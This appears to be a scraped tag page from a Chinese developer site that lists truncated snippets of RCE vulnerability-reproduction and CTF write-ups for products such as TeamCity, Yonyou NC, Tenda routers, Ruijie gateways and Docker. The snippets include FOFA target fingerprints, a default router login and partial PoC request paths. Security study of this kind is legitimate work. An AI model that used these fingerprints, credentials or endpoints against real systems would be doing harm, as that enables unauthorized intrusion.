E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
rce
SMBGhost_
RCE
漏洞(CVE-2020-0796永恒之黑)
https://blog.csdn.net/qq_45372008/article/details/106980409https://zhuanlan.zhihu.com/p/374949632SMB3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用WindowsSMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。影响
开心星人
·
2023-12-05 02:35
Web安全
smb漏洞
用友NC FileUploadServlet 反序列化
RCE
漏洞复现
0x01产品简介用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。0x02漏洞概述用友NCnc.file.pub.imple.FileUploadServlet反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。0x03复现环境FOFA:app="用友-UFIDA-NC"0x04漏洞复现ExpPOST/servlet/~base
OidBoy_G
·
2023-12-04 22:03
漏洞复现
安全
web安全
鸿宇多用户商城user.php
RCE
漏洞复现
0x01产品简介鸿宇多用户商城是一款支持各行业的多商家入驻型电商平台系统,商家版APP,微信商城,小程序及各种主流营销模块应有尽有,是一个功能强大的电子商务平台,旨在为企业和个人提供全面的在线购物解决方案。0x02漏洞概述鸿宇多用户商城user.php存在任意命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。0x03复现环境FOFA:bod
OidBoy_G
·
2023-12-04 20:00
漏洞复现
安全
web安全
DSShop移动商城网店系统 反序列化
RCE
漏洞复现
0x01产品简介DSShop是长沙德尚网络科技有限公司推出的一款单店铺移动商城网店系统,能够帮助企业和个人快速构建手机移动商城,并减少二次开发带来的成本。以其丰富的营销功能,精细化的用户运营,解决电商引流、推广难题,帮助企业打造生态级B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的多用户商城源码,为企业电商业务长线快
OidBoy_G
·
2023-12-04 20:26
漏洞复现
web安全
安全
百为智能流控路由器
RCE
漏洞复现
0x01产品简介BYTEVALUE百为流控路由器是一款追求带宽利用率的多功能路由器。0x02漏洞概述百为智能流控路由器/goform/webRead/open路由的?path参数存在有回显的命令注入漏洞,未经身份认证的攻击者可以利用此漏洞执行任意指令,获取服务器权限。0x03复现环境FOFA:app="BYTEVALUE-智能流控路由器"0x04漏洞复现PoCGET/goform/webRead/
OidBoy_G
·
2023-12-04 16:03
漏洞复现
智能路由器
web安全
安全
JetBrains TeamCity
RCE
漏洞复现(CVE-2023-42793)
0x01产品简介JetBrainsTeamCity是JetBrains公司开发的一款通用CI/CD软件平台。0x02漏洞概述JetBrainsTeamCity可通过访问/app/rest/users/{{id}}/tokens/RPC2端点获取对应id用户的有效token,携带admintoken访问受限端点导致远程命令执行或创建后台管理员用户。0x03影响范围TeamCityOn-Premise
OidBoy_G
·
2023-12-04 16:03
漏洞复现
安全
web安全
Tenda 路由器 uploadWewifiPic后台
RCE
漏洞复现
0x01产品简介腾达路由器是一款高效实用的路由器,致力于为家庭用户提供舒适、便捷、自然的智慧家庭体验。简单便捷的部署在家庭中,彻底解决家庭用户的网络接入问题。0x02漏洞概述腾达路由器后台uploadWewifiPic路由存在命令执行漏洞,攻击者可利用漏洞执行任意命令获取服务器权限。0x03复现环境FOFA:app="Tenda-路由器"0x04漏洞复现默认弱口令登录账号:admin密码:gues
OidBoy_G
·
2023-12-04 16:27
漏洞复现
智能路由器
web安全
记录一次vulhub:Jupyter Notebook 未授权访问漏洞复现
一、环境搭建1、在docker容器里搭建环境cdvulhub-master/jupyter/notebook-
rce
/2、进入目录下,启动环境docker-composeup-d3、查看环境端口dockerps-a
sszsNo1
·
2023-12-04 14:16
jupyter
docker
安全
2023SICTF-web-白猫-
RCE
0×01分析题目题目名称:
RCE
题目简介:请bypass我!题目环境:http://210.44.151.51:10088/函数理解:#PHPstr_replace()函数HelloShanghai!
白猫a٩
·
2023-12-04 00:48
CTF做题笔记
前端
php
android
开发语言
web安全
安全
ctf
vulhub-CVE-2021-41773
漏洞危害可利用漏洞进行远程
RCE
,访问web服务器上文档根目录之外的任意文件。泄露CGI。
「已注销」
·
2023-12-03 14:43
漏洞复现
安全
web安全
锐捷RG-UAC应用网关 前台
RCE
漏洞复现
0x01产品简介锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。0x02漏洞概述锐捷RG-UAC应用管理网关nmc_sync.php接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。0x03复现环境FOFA:app="Ruijie-RG-UAC"0x04漏洞复现PoCGET/view/systemConfig/management/nmc_sync.php?c
OidBoy_G
·
2023-12-03 13:11
漏洞复现
web安全
安全
RCE
绕过
1.[SCTF2021]rceme总结下获取disabled_funciton的方式1.phpinfo()2.var_dump(ini_get(“disable_functions”));3.var_dump(get_cfg_var(“disable_functions”));其他的var_dump(get_cfg_var(“open_basedir”));var_dump(ini_get_all
El.十一
·
2023-12-03 12:19
python
前端
服务器
web:very_easy_sql(sql、ssrf、gopher协议sql注入)
题目页面显示如下显示不是内部用户,无法识别信息查看源码,找到一个use.php访问之后显示如下随便输入了一个,发现url有参数显示试一下靶机的网址,返回nonono联系之前原始页面写的“不是内网用户,无法别识身份”这里没有
rce
sleepywin
·
2023-12-03 09:19
CTF-web
sql注入
sql
数据库
网络安全
web安全
锐捷EWEB网管系统
RCE
漏洞复现
0x01产品简介锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以“数据时代创新网管与信息安全”为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。0x02漏洞概述Ruijie-EWEB网管系统flwo.control.php中的type参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。0x03复现环境
OidBoy_G
·
2023-12-03 08:32
漏洞复现
安全
web安全
网络
中国蚁剑AntSword反制
RCE
漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
中国蚁剑(AntSword)是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。WebShellWebShell可以理解为网页中的木马程序,通过植入到你的web站点,在web页面上的操作,控制你的计算机操作系统,文件,权限,任意命令执行。常见的WebShell分为大马、小马、一句话木马、内存马等。下面为一句话木马的代码展示:#一句话木马中国蚁剑(An
4ustn1ne
·
2023-12-03 00:02
网络安全
RCE
WEBSHELL
网络安全
node.js
javascript
上传漏洞(CVE-2022-29464)
该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得
RCE
漏洞分析提示存在未授权任意登录,就是不需要登录可以任意上传文件界面显示没有思路搜大神的
securitor
·
2023-12-03 00:13
春秋靶场
安全
系统安全
无垠的太空第四部 Cibola Burn 第十二章:伯西亚
他制造的炸弹摧毁了
RCE
航天飞机并杀死了联合国船长。当库普和其他人谋杀
RCE
安全小组时,他一直在那里。也许从那以后再也没有回来。也许他已经是一个死人了,或者是一个注定要在监狱里生活的人。
yakamoz001
·
2023-12-02 14:43
命令执行(
RCE
)与反序列化
命令执行(
RCE
漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。)
赤赤三
·
2023-12-02 09:25
web安全
Redis主从复制实现
RCE
文章目录前置知识概念redismodule利用条件利用工具思路例题[网鼎杯2020玄武组]SSRFMe前置知识概念背景是多台服务器要保存同一份数据,如何实现其一致性呢?数据的读写操作是否每台服务器都可以处理?这里Redis就提供了主从复制的模式来避免此问题主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务
_rev1ve
·
2023-12-02 04:58
redis
bootstrap
数据库
web安全
安全
学习
2022UUCTF-web
UUCTFwebsignez_
rce
--闭合ezsql--输入反向ezrce--6字符
RCE
方法一方法二ez_unser--引用绕过wakeupez_upload--apache解析漏洞phonecode
yb0os1
·
2023-12-01 21:27
CTF
安全
php
开发语言
CTF中字符长度限制下的命令执行
rce
(7字符5字符4字符)汇总
七字符
rce
源码';echoshell_exec($_GET[1]);}else{exit('toolong');}?
OceanSec
·
2023-12-01 17:53
#
CTF
php
爬虫
python
【Web】UUCTF 2022 新生赛 个人复现
目录①websign②ez_
rce
③ez_upload④ez_unser⑤ezsql⑥ezpop⑦funmd5⑧phonecode⑨ezrce①websign右键打不开,直接抓包发包看源码②ez_
rce
Z3r4y
·
2023-12-01 16:22
CTF
WEB
笔记
web安全
安全
Panalog 日志审计系统 前台
RCE
漏洞复现
0x01产品简介Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。0x02漏洞概述Panalog日志审计系统sy_query.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。0x03复现环境FOFA:app="Panabit-Panalog"0x04漏洞复现PoCPOST/account/sy_query.phpHTTP/1.1Host:your-
OidBoy_G
·
2023-12-01 11:06
漏洞复现
安全
web安全
VNCTF(web)小白详解
发现这个就是我们fastjson,
rce
了。https:/
Dem0@
·
2023-11-30 22:29
CTF复现
web
安全
记一次代码审计中
RCE
挖掘及POC编写
文章转自先知社区:https://xz.aliyun.com/t/13008作者:雨下整夜声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。从危险的模板引入开始在前面熟悉代码的过程中,可以注意到此CMS的模板引入方式。以catalog_add.php文件为例,直接采用了include来将htm文件包含,而不是将php文件处理的数据放入
蚁景网络安全
·
2023-11-30 19:17
网络安全
信息安全
安全
红队攻防实战之钉钉
RCE
我这一生如履薄冰,你说我能走到对岸吗?本文首发于SecIN社区,原创作者即是本人前言网络安全技术学习,承认⾃⼰的弱点不是丑事。只有对原理了然于⼼,才能突破更多的限制。拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板。知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。一、影响版本:经测试需要钉钉版本<6.3.25-Release.2149108二、poc:三、
各家兴
·
2023-11-30 02:26
0.红队攻防
#
1.
红队实战
钉钉
安全
web安全
网络
php
开发语言
【Web】SWPUCTF 2022 新生赛 个人复现
目录①webdog1__start②ez_
rce
③ez_sql④ez_1zpop⑤file_maste⑥Power!
Z3r4y
·
2023-11-29 11:57
数据库
CTF
WEB
安全
笔记
SWPU
fastjson1.2.47
RCE
远程命令执行漏洞复现
fastjson1.2.47
RCE
远程命令执行漏洞复现漏洞背景在2019年6月,fastjson被爆出在fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec
zyl404
·
2023-11-29 03:51
网络安全
海康运行管理中心
RCE
漏洞复现
0x01产品简介海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。海康运行管理中心是一款功能强大、易于使用的安防管理平台,能满足用户对视频监控、报警管理、设备配置和数据统计等方面的需求,帮助用户建立高效、智能的安防系统。0x02漏洞概述海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本
OidBoy_G
·
2023-11-28 22:34
漏洞复现
安全
web安全
云匣子 FastJson反序列化
RCE
漏洞复现
0x01产品简介云匣子是租户连接云资源的安全管理工具,帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。云安宝结合多年的运维和安全实践,将云上的运维和安全有机结合,实现对运维过程的事前规划、事中控制和事后审计。在此之上,云匣子还完美集成了自动化运维、资产拓扑发现、账号安全等功能0x02漏洞概述云匣子authService接口处使用存在漏洞fastjson组件,未授权的攻击者可通过fastj
OidBoy_G
·
2023-11-27 06:06
漏洞复现
安全
web安全
Telesquare TLR-2005Ksh 路由器
RCE
漏洞复现
0x01产品简介TelesquareTlr-2005Ksh是韩国Telesquare公司的一款Sk电讯Lte路由器。0x02漏洞概述TelesquareTLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。0x03复现环境FOFA:app="TELESQUARE-TLR-2005KSH"0x04漏洞复现PoCGET/cgi-bin/ad
OidBoy_G
·
2023-11-27 06:03
漏洞复现
网络
web安全
安全
红队攻防文库文章集锦
再救你一次,不要让欲望击溃你的意志0.红队攻防1.红队实战红队攻防之特殊场景上线cs和msfCVE-2021-42287&CVE-2021-42278域内提权红队攻防之Goby反杀红队攻防实战之钉钉
RCE
各家兴
·
2023-11-26 23:50
0.红队攻防
#
1.
红队实战
1.web攻防
web安全
oracle
数据库
python
java
开发语言
android
漏洞复现-docker-unauthorized-
rce
目录一、漏洞介绍1.1漏洞成因2.2环境准备二、漏洞检测三、漏洞利用1.脚本利用2.定时任务反弹shell3.写ssh公钥获取shell一、漏洞介绍1.1漏洞成因dockerremoteAPI未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备靶机环境:192.168.xx.xxx(ubuntu)攻击环境:192
_s1mple
·
2023-11-25 06:19
web安全
漏洞复现
安全
docker
容器
致远M3 反序列化
RCE
漏洞复现(XVE-2023-24878)
0x01产品简介M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。0x02漏洞概述致远M3server中mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message
OidBoy_G
·
2023-11-24 13:21
漏洞复现
安全
web安全
I Doc View在线文档预览系统
RCE
漏洞(QVD-2023-45061)
0x01产品简介iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。0x02漏洞概述漏洞成因本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。利用特征攻击者利用该漏洞的关键在于使用具有远程页面缓存功能的接口,在参数中填写预先准备的包含恶意文件
OidBoy_G
·
2023-11-24 13:44
漏洞复现
安全
web安全
WAF绕过
RCE
1.第一关:if((!preg_match('/lv100/i',$level))&&(preg_match('/lv100/i',escapeshellarg($level)))){echofile_get_contents('./hint.php');}escapeshellarg的作用是把字符串转码为可以在shell命令里使用的参数。(escapeshellarg和escapeshellcm
El.十一
·
2023-11-24 04:40
windows
服务器
运维
一些
RCE
的汇总
RCE
自增
RCE
参考[CTFshow-
RCE
极限大挑战官方wp]
RCE
-1[过滤.(]
RCE
-2p[自增-Array]
RCE
-3[自增-NAN-过滤了(和.
有点水啊
·
2023-11-23 05:41
php
开发语言
Web的基本漏洞--命令执行漏洞
RCE
目录一、命令执行漏洞1.命令执行漏洞的原理2.命令执行漏洞分类3.命令执行漏洞的危害4.命令执行漏洞的防范措施5.命令执行漏洞的绕过一、命令执行漏洞命令执行漏洞是指攻击者可以随意执行系统命令。它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅仅存在于B/S架构中,在C/S架构中也常常遇到。简单的说,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况
尽-欢
·
2023-11-23 00:40
#
信息安全
安全
web安全
远程代码执行漏洞的利用与防御
什么是
RCE
漏洞全称:remotecommand/codeexecute分为远程命令执行和远程代码执行1.命令执行漏洞:直接调用操作系统命令2.代码执行漏洞:靠执行脚本代码调用操作系统命令一般出现这种漏洞
非酋King
·
2023-11-23 00:37
安全
web安全
网络
网络安全-
RCE
(远程命令执行)漏洞原理、攻击与防御
目录简介原理攻击防御简介
RCE
(remotecommand/codeexecute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器
lady_killer9
·
2023-11-23 00:34
网络安全
#
Web安全
安全
php
远程命令执行漏洞原理,以及防护绕过方式
一、背景
RCE
(RemoteCommand/CodeExecute)远程代码执行漏洞通过PHP代码注入、Java代码注入等方式连接程序中预留的后门或接口从而进行远程命令执行,达到对服务器的控制。
Scalzdp
·
2023-11-23 00:59
WEB安全
网络安全
信息安全
web安全
远程命令执行漏洞
远程命令执行漏洞绕过
2020HW期间0day快报集合[ 每日更新 ]
0x05泛微OA云桥任意文件读取漏洞0x06ExchangeServer远程代码执行漏洞(POC未验证)0x07联软科技产品【准入】存在任意文件上传和命令执行漏洞0x08通达0Av11.7后台SQL注入导致
RCE
0x09
「已注销」
·
2023-11-22 23:24
漏洞复现
安全
信息安全
Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
KafkaConnectWorker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成
RCE
zxl2605
·
2023-11-22 22:03
kafka
分布式
【春秋云境】CVE-2022-29464
该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得
RCE
。
仲瑿
·
2023-11-22 21:13
春秋云境Σ(っ
°Д
°;)っ
安全
【漏洞复现】内网实战-Sunlogin
RCE
向日葵远程代码执行
文章目录漏洞介绍一、影响版本二、实战1.漏洞检测工具与思路2.实战检测总结漏洞介绍向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。SunloginRCE是漏洞发生在接口/check处,当参数cmd的值以pin
白帽子是假的
·
2023-11-22 16:58
网络安全
IP-guard Web系统远程命令执行漏洞说明
一、漏洞说明近期收到反馈,IP-guardWeb服务器存在远程命令执行漏洞(
RCE
),经过分析,确认是因为Web系统的申请审批功能使用了开源插件flexpaper实现文件在线预览功能,此插件存在远程代码执行漏洞
Chenchen_new
·
2023-11-22 07:39
tcp/ip
网络协议
网络
IP-GUARD
ipguard
记录第一次利用CVE-2023-33246漏洞实现RocketMQ宿主机远程代码执行的兴奋
我依然记得自己第一次发现xss漏洞时候的兴奋:我也记得自己第一次发现sql输入时候的快乐:直到最近我终于收获了人生的第一个远程代码执行漏洞的利用(
RCE
:remotecodeexecute),虽然这个漏洞的危害远超过了前两个
叶常落
·
2023-11-22 06:39
security
rocketmq
2021SCTF
前言复现环境:NSSCTF总结第一个就是学到了RCEME中绕过disabled_function和无参数
rce
的方法第二个就是找反序列化链子upload1和upload2都是找yii的反序列化链子,$可控
Z3eyOnd
·
2023-11-22 05:03
CTF训练日记
mysql
php
数据库
[SCTF 2021]rceme 复现
前言做题做到这道题,又学到了新的无参
rce
利用的技巧以及绕过disable_fucntion的技巧知识点无参
rce
无字母数字rceiconv绕过disable_function可变参数数组表示字符串复现过程源码
绮洛Ki1ro
·
2023-11-22 05:32
CTF_复现
php
linux
网络安全
web安全
安全
[SCTF 2021]rceme
文章目录前置知识可变参数绕过create_function注入无字母数字
RCE
动态链接库so绕过disable_functions利用php原生类进行文件读取解题过程前置知识可变参数绕过PHP在用户自定义函数中支持可变数量的参数列表
_rev1ve
·
2023-11-22 05:59
web安全
安全
php
python
上一页
2
3
4
5
6
7
8
9
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他